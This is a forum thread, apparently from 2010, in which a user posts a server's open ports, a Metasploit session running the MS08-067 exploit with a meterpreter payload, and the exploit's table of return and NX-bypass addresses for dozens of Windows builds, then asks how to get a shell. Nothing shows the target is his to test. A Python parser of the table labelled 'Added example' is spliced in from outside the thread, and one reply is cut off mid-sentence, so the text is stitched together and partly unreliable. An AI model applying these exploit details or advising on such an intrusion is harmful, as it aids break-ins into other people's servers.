Title: Problem getting a remote shell
Posted by: Debci on 8 January 2010, 17:07
Hi everyone, I'm auditing a server which, judging by the number of open ports, seems to be very vulnerable, but as I mentioned a while ago, I can't attack it with ms08_067_netapi on port 445 (yep, it's open), because it doesn't correctly detect the language pack of Wind0w$. These are the open ports (try not to drool):

7/tcp open echo
9/tcp open discard
13/tcp open daytime
17/tcp open qotd
19/tcp open chargen
21/tcp open ftp
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1027/tcp open IIS
1028/tcp open unknown
1029/tcp open ms-lsa
1030/tcp open iad1
1031/tcp open iad2
1455/tcp open esl-lm
3306/tcp open mysql
3389/tcp open ms-term-serv
8009/tcp open ajp13
8080/tcp open http-proxy
8085/tcp open unknown
8402/tcp open unknown
8443/tcp open https-alt
OK, now comes the technical part, where I fail:

debci@0x81:/pentest/exploits/framework3$ sudo ./msfconsole
[sudo] password for debci:

       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 491 exploits - 225 auxiliary
+ -- --=[ 251 payloads - 23 encoders - 8 nops
       =[ svn r8082 updated today (2010.01.07)

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST xx.xx.xx.xx
RHOST => xx.xx.xx.xx
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 R2 Service Pack 2 - lang:Unknown
[*] Could not determine the exact language pack
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
So I started investigating (following a link that fellow member kamsky gave me): http://www.pentester.es/2009/11/por-que-no-consigo-shell-con-mi.html OK, but that guide explains how to do it by fiddling with a Windows .exe process, and I work on Linux, and that's the problem. Anyway, I started researching the exploit; in my case it runs under the Metasploit framework interpreter, and to my surprise it does have the Spanish language, which is the probable one on the host. Look:

#
# UNIVERSAL TARGETS
#

#
# Antoine's universal for Windows 2000
# Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
#
[ 'Windows 2000 Universal', { 'Ret' => 0x001f1cb0, 'Scratch' => 0x00020408, } ], # JMP EDI SVCHOST.EXE

#
# Standard return-to-ESI without NX bypass
# Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
#
[ 'Windows XP SP0/SP1 Universal', { 'Ret' => 0x01001361, 'Scratch' => 0x00020408, } ], # JMP ESI SVCHOST.EXE

#
# ENGLISH TARGETS
#

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 English (NX)', { 'Ret' => 0x6f88f727, 'DisableNX' => 0x6f8916e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 English (NX)', { 'Ret' => 0x6f88f807, 'DisableNX' => 0x6f8917c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Standard return-to-ESI without NX bypass
[ 'Windows 2003 SP0 Universal', { 'Ret' => 0x0100129e, 'Scratch' => 0x00020408, } ], # JMP ESI SVCHOST.EXE

# Standard return-to-ESI without NX bypass
[ 'Windows 2003 SP1 English (NO NX)', { 'Ret' => 0x71bf21a2, 'Scratch' => 0x00020408, } ], # JMP ESI WS2HELP.DLL

# Brett Moore's crafty NX bypass for 2003 SP1
[ 'Windows 2003 SP1 English (NX)',
  {
    'RetDec'    => 0x7c90568c, # dec ESI, ret @SHELL32.DLL
    'RetPop'    => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL
    'JmpESP'    => 0x7c86fed3, # jmp ESP @NTDLL.DLL
    'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL
    'Scratch'   => 0x00020408,
  }
],

# Standard return-to-ESI without NX bypass
[ 'Windows 2003 SP2 English (NO NX)', { 'Ret' => 0x71bf3969, 'Scratch' => 0x00020408, } ], # JMP ESI WS2HELP.DLL

# Brett Moore's crafty NX bypass for 2003 SP2
[ 'Windows 2003 SP2 English (NX)',
  {
    'RetDec'    => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL
    'RetPop'    => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL
    'JmpESP'    => 0x7c86a01b, # jmp ESP @NTDLL.DLL
    'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL
    'Scratch'   => 0x00020408,
  }
],

#
# NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED
#

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP2 Arabic (NX)', { 'Ret' => 0x6fd8f727, 'DisableNX' => 0x6fd916e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP2 Chinese - Traditional / Taiwan (NX)', { 'Ret' => 0x5860f727, 'DisableNX' => 0x586116e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP2 Chinese - Simplified (NX)', { 'Ret' => 0x58fbf727, 'DisableNX' => 0x58fc16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP2 Chinese - Traditional (NX)', { 'Ret' => 0x5860f727, 'DisableNX' => 0x586116e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP2 Czech (NX)', { 'Ret' => 0x6fe1f727, 'DisableNX' => 0x6fe216e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP2 Danish (NX)', { 'Ret' => 0x5978f727, 'DisableNX' => 0x597916e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP2 German (NX)', { 'Ret' => 0x6fd9f727, 'DisableNX' => 0x6fda16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP2 Greek (NX)', { 'Ret' => 0x592af727, 'DisableNX' => 0x592b16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP2 Spanish (NX)', { 'Ret' => 0x6fdbf727, 'DisableNX' => 0x6fdc16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP2 Finnish (NX)', { 'Ret' => 0x597df727, 'DisableNX' => 0x597e16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP2 French (NX)', { 'Ret' => 0x595bf727, 'DisableNX' => 0x595c16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP2 Hebrew (NX)', { 'Ret' => 0x5940f727, 'DisableNX' => 0x594116e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP2 Hungarian (NX)', { 'Ret' => 0x5970f727, 'DisableNX' => 0x597116e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP2 Italian (NX)', { 'Ret' => 0x596bf727, 'DisableNX' => 0x596c16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP2 Japanese (NX)', { 'Ret' => 0x567fd3be, 'DisableNX' => 0x568016e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP2 Korean (NX)', { 'Ret' => 0x6fd6f727, 'DisableNX' => 0x6fd716e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP2 Dutch (NX)', { 'Ret' => 0x596cf727, 'DisableNX' => 0x596d16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP2 Norwegian (NX)', { 'Ret' => 0x597cf727, 'DisableNX' => 0x597d16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP2 Polish (NX)', { 'Ret' => 0x5941f727, 'DisableNX' => 0x594216e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP2 Portuguese - Brazilian (NX)', { 'Ret' => 0x596ff727, 'DisableNX' => 0x597016e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP2 Portuguese (NX)', { 'Ret' => 0x596bf727, 'DisableNX' => 0x596c16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP2 Russian (NX)', { 'Ret' => 0x6fe1f727, 'DisableNX' => 0x6fe216e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP2 Swedish (NX)', { 'Ret' => 0x597af727, 'DisableNX' => 0x597b16e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP2 Turkish (NX)', { 'Ret' => 0x5a78f727, 'DisableNX' => 0x5a7916e2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 Arabic (NX)', { 'Ret' => 0x6fd8f807, 'DisableNX' => 0x6fd917c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP3 Chinese - Traditional / Taiwan (NX)', { 'Ret' => 0x5860f807, 'DisableNX' => 0x586117c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP3 Chinese - Simplified (NX)', { 'Ret' => 0x58fbf807, 'DisableNX' => 0x58fc17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP3 Chinese - Traditional (NX)', { 'Ret' => 0x5860f807, 'DisableNX' => 0x586117c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP3 Czech (NX)', { 'Ret' => 0x6fe1f807, 'DisableNX' => 0x6fe217c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP3 Danish (NX)', { 'Ret' => 0x5978f807, 'DisableNX' => 0x597917c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP3 German (NX)', { 'Ret' => 0x6fd9f807, 'DisableNX' => 0x6fda17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP3 Greek (NX)', { 'Ret' => 0x592af807, 'DisableNX' => 0x592b17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP3 Spanish (NX)', { 'Ret' => 0x6fdbf807, 'DisableNX' => 0x6fdc17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP3 Finnish (NX)', { 'Ret' => 0x597df807, 'DisableNX' => 0x597e17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP3 French (NX)', { 'Ret' => 0x595bf807, 'DisableNX' => 0x595c17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP3 Hebrew (NX)', { 'Ret' => 0x5940f807, 'DisableNX' => 0x594117c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP3 Hungarian (NX)', { 'Ret' => 0x5970f807, 'DisableNX' => 0x597117c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP3 Italian (NX)', { 'Ret' => 0x596bf807, 'DisableNX' => 0x596c17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP3 Japanese (NX)', { 'Ret' => 0x567fd4d2, 'DisableNX' => 0x568017c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP3 Korean (NX)', { 'Ret' => 0x6fd6f807, 'DisableNX' => 0x6fd717c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP3 Dutch (NX)', { 'Ret' => 0x596cf807, 'DisableNX' => 0x596d17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP3 Norwegian (NX)', { 'Ret' => 0x597cf807, 'DisableNX' => 0x597d17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP3 Polish (NX)', { 'Ret' => 0x5941f807, 'DisableNX' => 0x594217c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP3 Portuguese - Brazilian (NX)', { 'Ret' => 0x596ff807, 'DisableNX' => 0x597017c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP3 Portuguese (NX)', { 'Ret' => 0x596bf807, 'DisableNX' => 0x596c17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP3 Russian (NX)', { 'Ret' => 0x6fe1f807, 'DisableNX' => 0x6fe217c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP3 Swedish (NX)', { 'Ret' => 0x597af807, 'DisableNX' => 0x597b17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
[ 'Windows XP SP3 Turkish (NX)', { 'Ret' => 0x5a78f807, 'DisableNX' => 0x5a7917c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

Having said that, I'd like to ask for your help: how can I do it? I'm stuck, I don't know how to do it, and I know very few vulnerabilities to exploit; the one I used most was ms08_67_netapi, but this time it has failed, and hitting it with the Nessus scanner and an autopwn doesn't work either (I didn't expect much from the latter -.-'). I'm open to suggestions of possible vulnerabilities on the host. If I manage it, I'll write it up as a model attack guide. Regards and thanks to everyone.
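Added example, not code from the thread or from Metasploit: a Python parser for the Targets table format quoted above, with a simplified model of automatic target selection (the matching rule is an assumption, not the module's real logic). It shows why a fingerprint ending in lang:Unknown matches no entry, and that the quoted table has Spanish entries only for XP SP2/SP3, none for the 2003 SP2 host fingerprinted here. The embedded table is a constructed subset with the addresses as quoted in the post.

```python
import re

# Constructed sample: a subset of the Targets table exactly as quoted in the post
# (addresses copied from there). Inline '#' comments are part of the format.
TARGETS_SRC = """
[ 'Windows 2000 Universal', { 'Ret' => 0x001f1cb0, 'Scratch' => 0x00020408, } ], # JMP EDI SVCHOST.EXE
[ 'Windows XP SP0/SP1 Universal', { 'Ret' => 0x01001361, 'Scratch' => 0x00020408, } ], # JMP ESI SVCHOST.EXE
[ 'Windows XP SP3 English (NX)', { 'Ret' => 0x6f88f807, 'DisableNX' => 0x6f8917c2, 'Scratch' => 0x00020408 } ],
[ 'Windows 2003 SP0 Universal', { 'Ret' => 0x0100129e, 'Scratch' => 0x00020408, } ], # JMP ESI SVCHOST.EXE
[ 'Windows 2003 SP2 English (NO NX)', { 'Ret' => 0x71bf3969, 'Scratch' => 0x00020408, } ], # JMP ESI WS2HELP.DLL
[ 'Windows 2003 SP2 English (NX)', { 'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL
    'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL
    'JmpESP' => 0x7c86a01b, 'DisableNX' => 0x7c83f517, 'Scratch' => 0x00020408, } ],
[ 'Windows XP SP3 Spanish (NX)', { 'Ret' => 0x6fdbf807, 'DisableNX' => 0x6fdc17c2, 'Scratch' => 0x00020408 } ],
"""

ENTRY_RE = re.compile(r"\[\s*'([^']+)'\s*,\s*\{(.*?)\}\s*\]", re.S)
PAIR_RE = re.compile(r"'(\w+)'\s*=>\s*(0x[0-9a-fA-F]+)")
# Fingerprint line as the module prints it, e.g. "Windows 2003 R2 Service Pack 2 - lang:Unknown"
FP_RE = re.compile(r"Windows (2000|XP|2003)(?: R2)?(?: Service Pack (\d))? - lang:(.+)")

def parse_targets(src):
    """Return [(name, {key: int})] for every target entry; '#' comments are stripped first."""
    code = "\n".join(line.split("#", 1)[0] for line in src.splitlines())
    return [(m.group(1), {k: int(v, 16) for k, v in PAIR_RE.findall(m.group(2))})
            for m in ENTRY_RE.finditer(code)]

def split_name(name):
    """'Windows XP SP3 Spanish (NX)' -> ('XP', 'SP3', 'Spanish'); Universal entries keep 'Universal'."""
    name = re.sub(r" \((NO )?NX\)$", "", name)
    _, os_, sp, *lang = name.split(" ", 3)
    if sp == "Universal":  # 'Windows 2000 Universal' carries no service-pack field
        sp, lang = "Universal", ["Universal"]
    return os_, sp, lang[0]

def auto_targets(targets, fingerprint):
    """Assumed model of auto-targeting: entries whose OS, SP and language fit the fingerprint."""
    m = FP_RE.match(fingerprint)
    if not m:
        return []
    os_, sp, lang = m.group(1), "SP" + (m.group(2) or "0"), m.group(3)
    chosen = []
    for name, _ in targets:
        tos, tsp, tlang = split_name(name)
        sp_ok = tsp == "Universal" or sp in tsp.split("/")
        if tos == os_ and sp_ok and tlang in ("Universal", lang):
            chosen.append(name)
    return chosen

TARGETS = parse_targets(TARGETS_SRC)
```

An empty result only means automatic targeting gave up; it is not evidence that MS08-067 is patched, so an exposed port 445 on this host remains a finding to verify by patch level.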
Title: Re: Problem getting a remote shell
Posted by: Shell Root on 8 January 2010, 18:28
Hmm, let's see. This has been discussed several times and it's been said that it may be a problem with: Regards!
Title: Re: Problem getting a remote shell
Posted by: Debci on 8 January 2010, 20:22
Hmm, let's see. This has been discussed several times and it's been said that it may be a problem with: Regards!

Hmmm, are you sure that the fact it doesn't detect the language is a firewall problem? Regards
Title: Re: Problem getting a remote shell
Posted by: Shell Root on 8 January 2010, 20:25
... and I know very few vulnerabilities to exploit; the one I used most was ms08_67_netapi, but this time it has failed.

I said it because of this... :D Regards!
Title: Re: Problem getting a remote shell
Posted by: Debci on 8 January 2010, 20:28
... and I know very few vulnerabilities to exploit; the one I used most was ms08_67_netapi, but this time it has failed. I said it because of this... :D Regards!

In that case, what do you recommend I do now? Regards
Title: Re: Problem getting a remote shell
Posted by: R007h on 10 January 2010, 04:31
First, offering lots of services doesn't mean it's veeery vulnerable... (when there's a good admin xD)
Study some other vulnerability; that's not the only one that exists xD
Cheers